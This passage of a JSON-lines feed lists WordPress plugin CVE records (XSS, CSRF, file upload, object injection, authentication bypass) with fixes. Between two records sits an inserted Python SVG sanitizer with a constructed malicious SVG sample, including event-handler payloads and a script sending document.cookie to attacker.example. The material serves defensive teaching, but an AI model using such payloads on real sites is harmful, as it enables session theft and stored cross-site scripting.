version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a297784-96cd-4135-a8f1-e50f3a0d71bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a297784-96cd-4135-a8f1-e50f3a0d71bd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-order-reorder\\\/trunk\\\/includes\\\/class-basket-order.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/one-click-order-reorder\\\/trunk\\\/includes\\\/class-basket-order.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110914\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5707","slug":"seo-slider","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The SEO Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slider' shortcode and post meta in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987802\\\/seo-slider#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987802\\\/seo-slider#file3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bc88a7-93ed-4d67-9383-b6d935a0df4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bc88a7-93ed-4d67-9383-b6d935a0df4d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-slider\\\/trunk\\\/includes\\\/shortcode.php?rev=2367856#L71\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4821","slug":"drag-and-drop-multiple-file-upload-for-woocommerce","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Drag and Drop Multiple File Upload for WooCommerce WordPress plugin before 1.1.1 does not filter all potentially dangerous file extensions. Therefore, an attacker can upload unsafe .shtml or .svg files containing malicious scripts.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ac0853b-03f7-44b9-aa9b-72df3e01a9b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ac0853b-03f7-44b9-aa9b-72df3e01a9b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8433","slug":"themehunk-megamenu-plus","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Easy Mega Menu Plugin for WordPress \u2013 ThemeHunk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018themehunk_megamenu_bg_image' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note that this was partially fixed in 1.1.0 due to the missing authorization protection that was added.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc661cfd-6290-4b36-858a-cf2269b5fcf9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc661cfd-6290-4b36-858a-cf2269b5fcf9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/trunk\\\/inc\\\/megamenu-base.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/trunk\\\/inc\\\/megamenu-base.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/views\\\/admin\\\/item_settings.php?rev=3156084#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/views\\\/admin\\\/item_settings.php?rev=3156084#L196\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3163871%40themehunk-megamenu-plus&new=3163871%40themehunk-megamenu-plus&sfp_email=&sfph_mail=#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3163871%40themehunk-megamenu-plus&new=3163871%40themehunk-megamenu-plus&sfp_email=&sfph_mail=#file21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5085","slug":"hash-form","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.0 via deserialization of untrusted input in the 'process_entry' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0166a2b2-24e2-4dd6-8842-d3e8dd7bb0dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0166a2b2-24e2-4dd6-8842-d3e8dd7bb0dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormEntry.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormEntry.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5084","slug":"hash-form","versionImpact":"1.1.0","versionEndExcluding":"1.1.1","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eef9e2fa-d8f0-42bf-95ac-ee4cafff0b14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eef9e2fa-d8f0-42bf-95ac-ee4cafff0b14?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormBuilder.php#L764\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormBuilder.php#L764\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090341\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36746","slug":"menu-swapper","versionEndExcluding":"1.1.1","description":"The Menu Swapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.0.2. This is due to missing or incorrect nonce validation on the mswp_save_meta() function. This makes it possible for unauthenticated attackers to save meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368729%40menu-swapper&new=2368729%40menu-swapper&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368729%40menu-swapper&new=2368729%40menu-swapper&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a04155-9fa8-45e0-b80b-3836d5271fa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49a04155-9fa8-45e0-b80b-3836d5271fa7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10563","slug":"woo-cart-count-shortcode","versionImpact":"1.0.4","versionEndExcluding":"1.1.0","description":"The WooCommerce Cart Count Shortcode WordPress plugin before 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ed69f6-9c9b-4548-9dbb-05b602530ef7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ed69f6-9c9b-4548-9dbb-05b602530ef7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11615","slug":"envolve-plugin","versionImpact":"1.0","versionEndExcluding":"1.1.0","description":"The Envolve Plugin plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 1.0 via the 'zetra_deleteLanguageFile' and 'zetra_deleteFontsFile' functions. This is due to the plugin not properly validating a file or its path prior to deleting it. This makes it possible for unauthenticated attackers to delete language files.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05909e9c-4f57-4556-bae9-b0b63a9a43ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05909e9c-4f57-4556-bae9-b0b63a9a43ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4837","slug":"cpo-companion","versionEndExcluding":"1.1.0","description":"The CPO Companion WordPress plugin before 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41abeacb-ef3e-4621-89bb-df0f2eb617da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/41abeacb-ef3e-4621-89bb-df0f2eb617da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11617","slug":"envolve-plugin","versionImpact":"1.0","versionEndExcluding":"1.1.0","description":"The Envolve Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'zetra_languageUpload' and 'zetra_fontsUpload' functions in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/envolve-consulting-business-wordpress-theme\\\/28748459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0ad02d9-546f-4bcb-b567-785e3acfb489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0ad02d9-546f-4bcb-b567-785e3acfb489?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-31290","slug":"demo-my-wordpress","versionImpact":"1.0.9.1","versionEndExcluding":"1.1.0","description":"Improper Privilege Management vulnerability in CodeRevolution Demo My WordPress allows Privilege Escalation. This issue affects Demo My WordPress: from n\/a through 1.0.9.1.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/demo-my-wordpress\\\/wordpress-demo-my-wordpress-plugin-1-0-9-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/demo-my-wordpress\\\/wordpress-demo-my-wordpress-plugin-1-0-9-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4272","slug":"support-svg","versionImpact":"1.0.0","versionEndExcluding":"1.1.0","description":"The Support SVG WordPress plugin before 1.1.0 does not sanitize SVG file contents, which enables users with at least the author role to upload SVG files containing malicious JavaScript and conduct Stored XSS attacks.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed1b1540-a0e2-434e-8769-9532c3ed5e31\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed1b1540-a0e2-434e-8769-9532c3ed5e31\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
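The CVE-2024-4272 record above says the plugin stored SVG uploads without sanitizing their contents. What that sanitization has to strip is worth seeing concretely, so the following is an added example of mine (not code from this file, from the Support SVG plugin or from WPScan): it drops the script-bearing elements, the on* event-handler attributes and the active-scheme hrefs from an uploaded SVG before it is stored. MALICIOUS_SVG is a constructed sample, not a real upload, and the element and attribute lists are my choices rather than the plugin's.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Serialize with the usual prefixes instead of ElementTree's generated ns0/ns1.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Element local names (lower-cased) that execute script or embed HTML inside the image.
# This denylist is my choice for the demo, not the plugin's; see the note below.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# URL-valued attributes; an active scheme in one of them is script execution.
URL_ATTRIBUTES = {"href", "{%s}href" % XLINK_NS}
ACTIVE_SCHEMES = ("javascript:", "vbscript:", "data:")


def _local_name(qualified):
    """'{namespace}name' -> 'name'; an unqualified name is returned unchanged."""
    return qualified.rsplit("}", 1)[-1]


def _is_active_url(value):
    # Browsers skip whitespace and control characters before the scheme, so "jav\tascript:"
    # is still javascript:; compact the value the same way before testing it.
    compact = "".join(ch for ch in value if ch > " ").lower()
    return compact.startswith(ACTIVE_SCHEMES)


def sanitize_svg(svg_text):
    """Return (clean_svg_text, removed), where removed names each element or attribute dropped."""
    root = ET.fromstring(svg_text)
    if root.tag != "{%s}svg" % SVG_NS:
        raise ValueError("not an SVG document: root element is %r" % root.tag)
    removed = []
    # Snapshot the tree first: detaching children while iterating over them is not safe.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local_name(child.tag).lower() in FORBIDDEN_ELEMENTS:
                parent.remove(child)
                removed.append("element <%s>" % _local_name(child.tag))
    for element in root.iter():
        for name in list(element.attrib):
            local = _local_name(name).lower()
            if local.startswith("on"):  # onload, onclick, onerror, ...
                del element.attrib[name]
                removed.append("attribute %s (event handler)" % local)
            elif name in URL_ATTRIBUTES and _is_active_url(element.attrib[name]):
                del element.attrib[name]
                removed.append("attribute %s (active URL)" % local)
    return ET.tostring(root, encoding="unicode"), removed


# Constructed sample of what an author-role user could upload to an unpatched site; not a
# real file from any incident.
MALICIOUS_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" '
    'onload="alert(document.cookie)">'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<a xlink:href="jav&#x09;ascript:alert(1)"><circle r="40"/></a>'
    '<foreignObject><body xmlns="http://www.w3.org/1999/xhtml">'
    '<img src="x" onerror="alert(1)"/></body></foreignObject>'
    '</svg>'
)

if __name__ == "__main__":
    clean, removed = sanitize_svg(MALICIOUS_SVG)
    print(clean)
    for item in removed:
        print("removed", item)
```

On the sample, the four findings are the script element, the foreignObject (which takes the HTML img and its onerror with it), the onload on the root and the tab-obfuscated javascript: href; the circle and its anchor survive. A denylist is enough to show which classes of content turn an image upload into stored XSS, but a production sanitizer should allowlist elements and attributes instead, should parse with defusedxml or DTD processing disabled so the same upload cannot also be an entity-expansion bomb, and should serve uploads from a cookie-less origin or with Content-Disposition: attachment as a second layer.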
{"CVE_ID":"CVE-2023-0499","slug":"quickswish","versionEndExcluding":"1.1.0","description":"The QuickSwish WordPress plugin before 1.1.0 does not have a CSRF check when activating plugins, which could allow attackers to make logged-in admins activate arbitrary plugins present on the blog via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342470a-a0ad-4f0b-b95f-7daa39a6362b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342470a-a0ad-4f0b-b95f-7daa39a6362b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13523","slug":"memorialday","versionImpact":"1.0.4","versionEndExcluding":"1.1.0","description":"The MemorialDay plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232363%40memorialday%2Ftrunk&old=3207291%40memorialday%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232363%40memorialday%2Ftrunk&old=3207291%40memorialday%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96cec16e-7bb3-4279-8c17-eca88d413ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96cec16e-7bb3-4279-8c17-eca88d413ad8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11028","slug":"multimanager-wp","versionImpact":"1.0.5","versionEndExcluding":"1.1.0","description":"The MultiManager WP \u2013 Manage All Your WordPress Sites Easily plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.5. This is due to the user impersonation feature inappropriately determining the current user via user-supplied input. This makes it possible for unauthenticated attackers to generate an impersonation link that will allow them to log in as any existing user, such as an administrator. NOTE: The user impersonation feature was disabled in version 1.1.0 and re-enabled with a patch in version 1.1.2.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8e7adc-3777-4fb1-a708-68da950e3d4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de8e7adc-3777-4fb1-a708-68da950e3d4f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184657\\\/multimanager-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184657\\\/multimanager-wp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184678\\\/multimanager-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184678\\\/multimanager-wp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184826\\\/multimanager-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184826\\\/multimanager-wp\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3387","slug":"lana-text-to-image","versionEndExcluding":"1.1.0","description":"The Lana Text to Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lana_text_to_image' and 'lana_text_to_img' shortcode in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929913\\\/lana-text-to-image\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2929913\\\/lana-text-to-image\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lana-text-to-image\\\/tags\\\/1.0.0\\\/lana-text-to-image.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lana-text-to-image\\\/tags\\\/1.0.0\\\/lana-text-to-image.php#L97\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8acb7893-85b2-404a-b3fe-b4c1a835b3eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8acb7893-85b2-404a-b3fe-b4c1a835b3eb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0605","slug":"auto-rename-media-on-upload","versionEndExcluding":"1.1.0","description":"The Auto Rename Media On Upload WordPress plugin before 1.1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57267c3c-d55e-4b37-a6d0-c5cd8569625c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57267c3c-d55e-4b37-a6d0-c5cd8569625c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7985","slug":"fileorganizer","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The FileOrganizer \u2013 Manage WordPress and Website Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the \"fileorganizer_ajax_handler\" function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: The FileOrganizer Pro plugin must be installed and active to allow Subscriber+ users to upload files.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149878\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149878\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8434","slug":"themehunk-megamenu-plus","versionImpact":"1.0.9","versionEndExcluding":"1.1.0","description":"The Easy Mega Menu Plugin for WordPress \u2013 ThemeHunk plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions hooked via AJAX in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform actions like updating plugin settings.","recommendation":"Update to version 1.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3869a9-f72d-4bbb-ba51-d2761ca761f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3869a9-f72d-4bbb-ba51-d2761ca761f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-base.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-setting.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156084\\\/themehunk-megamenu-plus\\\/tags\\\/1.1.0\\\/inc\\\/megamenu-setting.p